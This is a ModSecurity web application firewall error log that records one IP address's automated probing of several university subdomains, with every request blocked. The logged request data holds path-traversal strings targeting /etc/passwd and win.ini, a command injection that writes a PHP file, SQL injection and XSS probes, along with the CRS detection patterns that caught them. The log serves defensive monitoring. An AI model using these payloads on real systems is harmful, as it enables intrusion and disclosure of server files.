[Tue Aug 29 11:46:34.382330 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAjM6@QAAAAT"]
[Tue Aug 29 11:46:34.392025 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAib56YAAAAA"]
[Tue Aug 29 11:46:34.418449 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KsCo-f0AAAhZRqcAAAAG"]
[Tue Aug 29 11:46:34.431033 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAfEB@wAAAAO"]
[Tue Aug 29 11:46:34.443449 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAib56gAAAAA"]
[Tue Aug 29 11:46:34.447902 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAjL8OkAAAAR"]
[Tue Aug 29 11:46:35.400463 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO14K8Co-f0AAAhtjm4AAAAq"]
[Tue Aug 29 11:46:35.411394 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjH@ucAAAAI"]
[Tue Aug 29 11:46:35.414425 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAhT35YAAAAD"]
[Tue Aug 29 11:46:35.417546 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAhrqS4AAAAo"]
[Tue Aug 29 11:46:35.421553 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjN0NQAAAAU"]
[Tue Aug 29 11:46:35.428106 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjCa@QAAAAB"]
[Tue Aug 29 11:46:35.447082 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14K8Co-f0AAAhzvkIAAAAx"]
[Tue Aug 29 11:46:38.477327 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14LsCo-f0AAAhzvlQAAAAx"]
[Tue Aug 29 11:46:39.435112 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAjM6-IAAAAT"]
[Tue Aug 29 11:46:39.472536 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAhzvl0AAAAx"]
[Tue Aug 29 11:46:39.474046 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAjN0OQAAAAU"]
[Tue Aug 29 11:46:39.473749 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAi-REYAAAAH"]
[Tue Aug 29 11:46:39.481465 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAhgoPAAAAAb"]
[Tue Aug 29 11:46:40.481589 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14MMCo-f0AAAhzvmIAAAAx"]
[Tue Aug 29 11:46:41.382433 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhZRrAAAAAG"]
[Tue Aug 29 11:46:41.402815 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAjIhicAAAAJ"]
[Tue Aug 29 11:46:41.433708 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhzvmcAAAAx"]
[Tue Aug 29 11:46:41.449462 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhrqTkAAAAo"]
[Tue Aug 29 11:46:42.372825 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAhrqToAAAAo"]
[Tue Aug 29 11:46:42.383772 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14MsCo-f0AAAjIhioAAAAJ"]
[Tue Aug 29 11:46:42.483077 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAjIhi0AAAAJ"]
[Tue Aug 29 11:46:43.531697 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAjKysMAAAAQ"]
[Tue Aug 29 11:46:43.601592 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhzvm8AAAAx"]
[Tue Aug 29 11:46:43.629292 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14M8Co-f0AAAi3Z0wAAAAP"]
[Tue Aug 29 11:46:43.629602 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhZRrkAAAAG"]
[Tue Aug 29 11:46:43.651229 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhZRroAAAAG"]
[Tue Aug 29 11:46:44.420526 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14NMCo-f0AAAjIhi8AAAAJ"]
[Tue Aug 29 11:46:45.459124 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14NcCo-f0AAAjN0PsAAAAU"]
[Tue Aug 29 11:46:47.371638 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhBSJYAAAAX"]
[Tue Aug 29 11:46:47.425557 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAh4DeQAAAA2"]
[Tue Aug 29 11:46:47.428905 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhui6YAAAAr"]
[Tue Aug 29 11:46:47.448656 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhzvn0AAAAx"]
